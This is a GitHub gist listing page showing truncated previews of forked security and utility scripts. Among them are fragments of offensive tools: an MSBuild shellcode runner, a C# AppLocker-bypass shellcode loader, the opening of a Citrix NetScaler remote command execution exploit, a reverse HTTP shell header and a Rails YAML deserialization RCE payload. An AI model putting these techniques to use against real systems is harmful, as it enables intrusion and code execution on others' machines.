LongCat pich4ya

@pich4ya
pich4ya / flutter_ios.js
Created Jun 18, 2021 — forked from AICDEV/flutter_ios.js
Frida trace Flutter Functions on iOS
/**
* run the script to a running app: frida -U "appName" -l flutter_ios.js --no-pause
* start app direct with the script: frida -Uf bundleIdentifier -l flutter_ios.js --no-pause
*/
// #############################################
// HELPER SECTION START
var colors = {
"resetColor": "\x1b[0m",
"green": "\x1b[32m",
"yellow": "\x1b[33m",
@pich4ya
pich4ya / fix_virtualenv
Created May 16, 2020 — forked from tevino/fix_virtualenv
Fix python virtualenv after python update
#!/usr/bin/env bash
ENV_PATH="$(dirname "$(dirname "$(which pip)")")"
SYSTEM_VIRTUALENV="$(which -a virtualenv|tail -1)"
BAD_ENV_PATHS="/usr/local"
echo "Ensure the root of the broken virtualenv:"
echo " $ENV_PATH"
@pich4ya
pich4ya / shellcode.xml
Created May 1, 2020 — forked from ConsciousHacker/shellcode.xml
MSBuild Shellcode Runner
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes shellcode. -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
<!-- Save This File And Execute The Above Command -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
@pich4ya
pich4ya / Shellcode.cs
Created May 1, 2020 — forked from netbiosX/Shellcode.cs
C# file that contains shellcode and bypasses AppLocker via Assembly Load
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
 
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
@pich4ya
pich4ya / netscaler_exploit.py
Created Jan 19, 2020 — forked from 0x09AL/netscaler_exploit.py
Citrix ADC / NetScaler Remote Command Execution
import requests
import sys
import time
append_value = str(time.time())
print "# By 0x09AL - MDSec ActiveBreach \n"
def upload_file(url,payload):
endpoint = url + "/vpns/portal/scripts/newbm.pl"
@pich4ya
pich4ya / ChangePassword.java
Created Feb 24, 2019 — forked from zach-klippenstein/ChangePassword.java
The keystore password on Java keystore files is utterly pointless. You can reset it without knowing it, as shown by this code. Note that private keys are still secure, as far as I know. The JKS implementation is copyright Casey Marshall (rsdio@metastatic.org), and the original source is available at http://metastatic.org/source/JKS.java. I've in…
import java.util.*;
import java.io.*;
import java.security.*;
public class ChangePassword
{
private final static JKS j = new JKS();
public static void main(String[] args) throws Exception
{
@pich4ya
pich4ya / hashcat_macos.sh
Last active Feb 4, 2022 — forked from chadmayfield/hashcat_macos.sh
Install Hashcat on macOS
#!/bin/bash
git clone https://github.com/hashcat/hashcat.git
mkdir -p hashcat/deps
git clone https://github.com/KhronosGroup/OpenCL-Headers.git hashcat/deps/OpenCL
cd hashcat/ && make && make install
./hashcat --version
./hashcat -b -D 1,2
./example0.sh
@pich4ya
pich4ya / JSRat.ps1
Created Jul 4, 2018 — forked from nbosa/JSRat.ps1
Fileless JavaScript Reverse HTTP Shell
<#
Author: Casey Smith @subTee
License: BSD3-Clause
.SYNOPSIS
Simple Reverse Shell over HTTP. Execute Commands on Client.
@pich4ya
pich4ya / railspwn.rb
Last active Nov 29, 2018 — forked from niklasb/railspwn.rb
Rails 5.1.4 YAML unsafe deserialization RCE payload, full credit to: https://gist.github.com/500646/5a0add1a0301492714342ba82b1d3aee
# https://gist.github.com/500646/5a0add1a0301492714342ba82b1d3aee
require 'yaml'
require 'base64'
require 'erb'
class ActiveSupport
class Deprecation
def initialize()
@silenced = true
end